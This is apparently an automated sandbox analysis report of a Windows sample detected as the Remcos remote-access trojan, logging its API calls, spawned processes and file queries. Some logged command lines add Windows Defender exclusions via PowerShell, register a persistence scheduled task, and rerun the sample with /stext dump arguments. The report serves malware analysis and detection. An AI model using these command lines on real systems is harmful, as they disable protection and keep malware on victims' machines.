                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_00412132
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00419662 mouse_event,15_2_00419662
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerXH\i
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerXH\C%
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFilesCl@-P
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerXH\
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerXH\t
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10002933 cpuid 9_2_10002933
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: EnumSystemLocalesW,15_2_0045201B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: EnumSystemLocalesW,15_2_004520B6
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00452143
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetLocaleInfoW,15_2_00452393
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: EnumSystemLocalesW,15_2_00448484
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004524BC
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetLocaleInfoW,15_2_004525C3
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452690
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetLocaleInfoW,15_2_0044896D
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: GetLocaleInfoA,15_2_0040F90C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451D58
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: EnumSystemLocalesW,15_2_00451FD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_10002264
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041B69E GetUserNameW,15_2_0041B69E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_00449210
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0041739B GetVersionExW,17_2_0041739B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
